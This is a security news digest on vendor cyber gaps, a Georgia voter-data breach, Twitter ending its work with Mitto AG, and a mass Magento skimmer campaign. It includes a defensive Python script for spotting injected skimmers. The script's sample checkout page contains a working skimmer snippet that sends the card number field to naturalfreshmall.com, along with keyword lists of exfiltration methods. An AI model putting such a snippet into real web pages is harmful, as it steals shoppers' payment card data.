At a glance.
- Top five threats to third-party vendors.
- Voter data exposed in registration software breach.
- Twitter parts ways with Mitto AG.
- Magento skimmers.
Top five threats to third-party vendors.
Security risk management software provider Panorays has released the findings of its annual Third-Party Cyber Gap report. After analyzing data from tens of thousands of third-party vendors, Panorays identified the most prevalent cyber gaps these companies exhibited in 2021. The most common gap, present at 48% of vendors, was significant web assets left unprotected by a Web Application Firewall, followed by compromised credentials (44%) and unpatched web servers (37%). Rounding out the top five were vulnerable default CMS configurations and a lack of security team personnel, both at 33%. One bright spot is that patching is becoming less of a problem: over half of vendors had unpatched servers in 2019, against 37% in 2021. Chief Architect at Panorays and report author Giora Omer commented, “It is reassuring to see security teams taking greater initiative to patch their servers in a timely manner, and it’s a trend we hope to see continue in the years to come, particularly in light of the recent Log4j disclosure.”
Voter data exposed in registration software breach.
Software company EasyVote Solutions has disclosed a data breach that exposed registration information for voters in the state of Georgia. The Atlanta Journal-Constitution explains that EasyVote provides software for expediting the voter registration process in several Georgia counties. The stolen data was published on an online forum and likely included names, addresses, races, and dates of birth; according to EasyVote’s chief financial officer Charles Davis, Social Security numbers and driver’s license numbers were not compromised. The company learned of the breach on January 31, but it is unclear how many voters were affected.
Twitter parts ways with Mitto AG.
Following allegations that Swiss automated-messaging company Mitto AG helped governments spy on citizens, Twitter has informed US Senator Ron Wyden that it will no longer work with the company. Bloomberg explains that Twitter used Mitto’s services to deliver sensitive one-time passcodes to users by SMS, and by severing ties the social media company is following the recent lead of messaging providers Kaleyra and MessageBird. The allegations, which surfaced in a December report by Bloomberg News and the London-based Bureau of Investigative Journalism, claim that Mitto co-founder and chief operating officer Ilja Gorelik secretly sold access to Mitto’s networks to help governments track individuals’ phones and obtain their call logs. Mitto has also been accused of exploiting weaknesses in the Signaling System 7 (SS7) telecommunications protocol.
Magento skimmers.
After investigating the mass breach of over five hundred e-commerce stores running on the Magento 1 platform, security firm Sansec confirmed earlier this week that a common link has been found. All of the impacted stores had been hit with a payment skimmer, loaded from the domain naturalfreshmall.com, designed to steal shoppers’ payment card data. The skimmer domain is now offline, but as Bleeping Computer explains, the attackers exploited a vulnerability in the Quickview plugin to inject rogue Magento admin users, which gave them code execution with the highest privileges; they then planted backdoors and used those to deploy the skimmer. Adobe ended support for the Magento 1 platform in 2020, but the impacted sites were still running the outdated software. Admins have been advised to ensure all Magento software is up to date.
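Because the skimmer in this incident was served from a third-party domain and injected into checkout pages, the quickest triage a store owner can run is to pull a checkout page and list every script it loads from a host that is not on a known-good allowlist, plus any inline script that both reads card fields and sends data off-site. The following is an added example, not code from Sansec, Bleeping Computer or Magento; the allowlist, the sample page and the keyword lists are assumptions constructed for illustration, and only the skimmer host naturalfreshmall.com comes from the report.

```python
"""Heuristic check for injected skimmer loaders on a Magento checkout page.

Added example, not code from Sansec, Bleeping Computer or Magento.
Uses only the standard library so it can be run offline against saved HTML.
"""
from html.parser import HTMLParser
from urllib.parse import urlparse

# Assumed allowlist of first-party and known-good script origins for the store.
ALLOWED_HOSTS = {"shop.example", "static.shop.example", "js.stripe.com"}

# Inline-script heuristics (assumed): a card-field reference plus an exfil primitive.
FORM_HINTS = ("cc_number", "cc_cid", "card", "cvv", "cvc")
EXFIL_HINTS = ("new Image", "XMLHttpRequest", "fetch(", "sendBeacon", "WebSocket")

# Constructed checkout page: two legitimate loaders, one protocol-relative loader
# from the skimmer host named in the report, one benign inline script, and one
# inline snippet that behaves like a skimmer (reads cc_number, beacons it out).
SAMPLE_PAGE = """<html><head>
<script src="/js/varien/form.js"></script>
<script src="https://static.shop.example/checkout.js"></script>
<script src="https://js.stripe.com/v3/"></script>
<script src="//naturalfreshmall.com/image/pixel.js"></script>
<script>var checkoutConfig = {step: 'payment'};</script>
<script>
var f = document.getElementById('cc_number');
f.addEventListener('change', function () {
  new Image().src = 'https://naturalfreshmall.com/c?d=' + btoa(f.value);
});
</script>
</head><body></body></html>"""


class _ScriptCollector(HTMLParser):
    """Collects <script src=...> targets and the bodies of inline <script> blocks."""

    def __init__(self):
        super().__init__()
        self.external = []   # src attribute of every <script src=...>
        self.inline = []     # text of every <script> without a src
        self._buf = None     # accumulates data while inside an inline script

    def handle_starttag(self, tag, attrs):
        if tag.lower() != "script":
            return
        src = dict(attrs).get("src")
        if src:
            self.external.append(src)
        else:
            self._buf = []

    def handle_data(self, data):
        # HTMLParser delivers <script> contents raw (CDATA mode) via handle_data.
        if self._buf is not None:
            self._buf.append(data)

    def handle_endtag(self, tag):
        if tag.lower() == "script" and self._buf is not None:
            self.inline.append("".join(self._buf))
            self._buf = None


def _collect(html):
    p = _ScriptCollector()
    p.feed(html)
    p.close()
    return p


def foreign_script_hosts(html, allowed_hosts=ALLOWED_HOSTS):
    """Sorted hosts of <script src> loaders that are not on the allowlist.

    Relative paths (hostname None) are treated as first-party and ignored;
    protocol-relative '//host/...' loaders are resolved like absolute ones.
    """
    hosts = set()
    for src in _collect(html).external:
        host = urlparse(src.strip()).hostname
        if host and host.lower() not in allowed_hosts:
            hosts.add(host.lower())
    return sorted(hosts)


def suspicious_inline_scripts(html):
    """Inline script bodies that reference card fields and also send data out."""
    hits = []
    for body in _collect(html).inline:
        reads_card = any(h in body for h in FORM_HINTS)
        sends_out = any(h in body for h in EXFIL_HINTS)
        if reads_card and sends_out:
            hits.append(body.strip())
    return hits


if __name__ == "__main__":
    print("foreign script hosts:", foreign_script_hosts(SAMPLE_PAGE))
    for script in suspicious_inline_scripts(SAMPLE_PAGE):
        print("suspicious inline script:\n" + script)
```

This is a triage aid, not a substitute for the advice above: a skimmer can also hide inside a legitimately hosted first-party file, so the allowlist check should be paired with integrity monitoring of the store's own JavaScript and a review of the admin_user table for accounts nobody created.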
Kunal Modasiya, senior director of product management at PerimeterX, commented on the incident:
"Magecart attackers are always looking for ways to avoid detection in their quest to steal the credit card information of customers. In this attack, 500 stores were the victim of a payment card skimmer loaded onto the naturalfreshmall.com domain. The actors also abused a known vulnerability in the Quickview plugin, which allowed them to inject Magento admin users that could then run code.
"Given the continued issues with outdated versions of the Magento platform, it is critical that e-commerce companies get real-time alert notifications for the payment card data leak. They should also quickly isolate any third-party library changes that have caused the incident, and quickly mitigate the risk by removing or updating the third-party library and block the PCI incident to prevent further PCI data leaks.”